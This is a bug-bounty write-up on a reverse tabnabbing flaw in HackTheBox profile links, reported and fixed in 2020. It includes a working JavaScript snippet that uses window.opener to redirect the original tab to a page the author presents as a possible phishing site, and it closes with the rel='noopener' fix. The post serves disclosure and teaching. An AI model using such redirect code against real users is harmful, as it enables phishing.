Posts HackTheBox was vulnerable to reverse tabnapping
Post
Cancel

HackTheBox was vulnerable to reverse tabnapping

ColumnDetails
BugReverse Tab-Napping
Submitted on28 Aug 2020
Fixed on29 Aug 2020
RewardA Bug Killer badge on my HackTheBox profile
SeverityMedium
My profilehttps://www.hackthebox.eu/home/users/profile/84820

Brief :

This was an easy bug but you should never underestimate any bug no matters how impacful it is (excluding very low ones).

As you all know that there is a section in profile of a hackthebox user where walkthroughs are shown submitted by him/her , so in that section when you will click on any machine’s writeup submitted by the user you will be simply redirected to a new tab and to the writeup itself , But the main thing was the new tab was opening with target="_blank" (its a link opener attribute in html). So I was able to redirect the user to a new url (any phishing page or any malicious website) using the window.parent.location.replace() (js code).

Reverse Tab-napping is the bug which did exist in gitlab , facebook , instagram etc…

Bug Poc :

So lets get started how i find the bug and exploited it , here is the poc video

https://drive.google.com/file/d/1JlCESsW_gi7eN8qgP8zdGczdrs1NtDSA/view?usp=sharing

Identifying the bug

I submitted magic machine’s writeup on hackthebox and the team approved it , On the same time I was testing a platform from bugcorwd and i was testing for reverse tabnapping there . I visit my hackthebox profile to check if walkthrough is approved or not and then I opened the writeup link and as obvious it redirected to new tab on my writeup page , then i also decided to test hackthebox for the tabnapping

view-page source

I just tried to check the HTML of the page to view how they are opening the writeup in the new tab and I was surprised (bcz it was infront of everyone’s eyes) they were doing that like this

1
<a href="https://0xprashant.github.io/posts/htb-magic/" target="_blank" >Magic</a>

exploiting the bug

And they were using target="_blank" without omiting rel="noopener nofollow" and now i am 1000% sure that i can exploit it.

I added the following code to my markdown file (since i am using github pages) of magic machine writeup and push the changes to github

1
2
3
4
5
6
<html>
<script>
if (window.opener) window.opener.parent.location.replace('https://0xprashant.github.io/pages/index.html');
if (window.parent != window) window.parent.location.replace('https://0xprashant.github.io/pages/index.html');
</script>
</html>

What the code will do is it will check if there is a Windows-open then replace the parent windows with the url i specified

my https://0xprashant.github.io/pages/index.html has the following code , Its just a dummy page that can be a malicious page or phishing page

1
2
3
<html>
<h1>A fake htb page / any malicious site</h1>
</html>

now if i simply click on the magic writeup on my profile I will be redirected to the writeup page but the initial tab will be redireted to https://0xprashant.github.io/pages/index.html you can check the bug poc video here….

https://drive.google.com/file/d/1JlCESsW_gi7eN8qgP8zdGczdrs1NtDSA/view?usp=sharing

I am able to redirect the initial page to a new page

And i make a nice poc while my college's online classes were running lol , and i didn’t pay any attention to the class at all since i was busy at making a poc and then i reported to them and got the response after 1 day

Live bug testing

If you want to test the bug , you can simply click on the link below and the writeup page will be redirected

https://0xprashant.github.io/posts/htb-magic/

What i did is add the url with the following code in my markdown file

markdown

1
[https://0xprashant.github.io/posts/htb-magic/](https://0xprashant.github.io/posts/htb-magic/){:target="_blank"}

html

1
<a href="https://0xprashant.github.io/posts/htb-magic/" target="_blank" >https://0xprashant.github.io/posts/htb-magic/</a>

Why this bug happens ?

When you open a link in a new tab ( target=”_blank” ), the page that opens in a new tab can access the initial tab and change it’s location using the window.opener property. And since it can access the initial page so i am able to change the parent tab to another page

Some references –

  1. https://owasp.org/www-community/attacks/Reverse_Tabnabbing
  2. https://medium.com/@jitbit/target-blank-the-most-underestimated-vulnerability-ever-96e328301f4c
  3. https://mathiasbynens.github.io/rel-noopener/
  4. https://dev.to/ben/the-targetblank-vulnerability-by-example

Some hackerone reports –

  1. https://hackerone.com/reports/179568
  2. https://hackerone.com/reports/23386
  3. https://hackerone.com/reports/211065

How to fix this type of bug

This can be simply fixed by adding a rel="noopener nofollow" attribute

Before fixing

1
<a href="https://0xprashant.github.io/posts/htb-magic/" target="_blank" >Magic</a>

after fix

1
<a href="https://0xprashant.github.io/posts/htb-magic/" target="_blank" rel="noopener nofollow">Magic</a>

and yes , it will be fixed

Thanks for Reading , i really appreciate it

You can support me on https://www.buymeacoffee.com/0xprashant to motivate me to write these type of writeups

I am thinking to upload some more bug Bounty Writeups along with hackthebox writeups on my blog so press the bell icon on the right side you are seeing and allow send notification

This post is licensed under CC BY 4.0 by the author.

© 2020 Prashant Saini.